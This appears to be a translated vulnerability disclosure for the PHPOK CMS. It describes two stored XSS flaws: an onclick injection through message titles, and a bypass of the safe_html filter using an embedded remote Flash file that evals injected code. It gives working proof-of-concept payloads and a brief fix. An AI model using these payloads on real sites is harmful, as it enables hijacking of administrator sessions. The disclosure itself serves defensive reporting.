PHPOK storage xss

PHPOK storage xss

The foreground function has a storage-type xss, which can attack the background and obtain administrator privileges.

The first xss vulnerability:

Message function.



One output point in the background is as follows:

<A class = "icon delete end" onclick = "content_del ('201312', '[input]')" title = "delete"> </a>

We can see that the title of our message is directly output in The onclick event. You can simply construct '+ alert (1) +', which is triggered when the Administrator deletes the message:
 

Output:

<A class = "icon delete end" onclick = "content_del ('201312', 'test' + alert (1) + '') "title =" delete "> </a>

 

Second xss vulnerability:

The function of PHPOK to filter XSS is as follows:

function safe_html($info){if(!$info){return false;}$tmp = "/<([a-zA-Z0-9]+)(.*)(on[abort|beforeonload|blur|change|click|contextmenu|dblclick|drag|dragend|dragenter|dragleave|dragstart|drop|error|focus|keydown|keypress|keyup|load|message|mousedown|mousemove|mouseover|mouseout|mouseup|mousewheel|reset|resize|scroll|select|submit|unload]+)=(.+)>/isU";$info = preg_replace($tmp,"<\\1\\2\\4>",$info);//$info = preg_replace("/<([a-zA-Z0-9]+)(.*)([onabort|onbeforeonload|onblur|onchange|onclick|oncontextmenu|ondblclick|ondrag|ondragend|ondragenter|ondragleave|ondragover|ondragstart|ondrop|onerror|onfocus|onkeydown|onkeypress|onkeyup|onload|onmessage|onmousedown|onmousemove|onmouseover|onmouseout|onmouseup|onmousewheel|onreset|onresize|onscroll|onselect|onsubmit|onunload]+)\s*=\s*(.+)>/isU","<\\1\\3>",$info);$tmp = array("/<script(.*)<\/script>/isU","/<frame(.*)>/isU","/<\/fram(.*)>/isU","/<iframe(.*)>/isU","/<\/ifram(.*)>/isU","/<style(.*)<\/style>/isU","/<link(.*)>/isU","/<\/link>/isU");$info = preg_replace($tmp,'',$info);return $info;}

It can be seen that only the tags and on Event attributes are filtered, so that they can be easily bypassed. For example, xss is implemented by introducing flash files:


<Embed src = "http://chuhades.sinaapp.com/xss.swf" quality = "high" bgcolor = "# ffffff" width = "500" height = "500" name = "FlashVars" align = "middle" allowscriptaccess = "always" flashvars = "action = eval & codz = alert (document. domain) "type =" application/x-shockwave-flash "pluginspage =" http://www.macromedia.com/go/getflashplayer ">

Front-end:
 

Background:
 

 

Solution:

Perform js encoding on the string that enters the js and html Tag events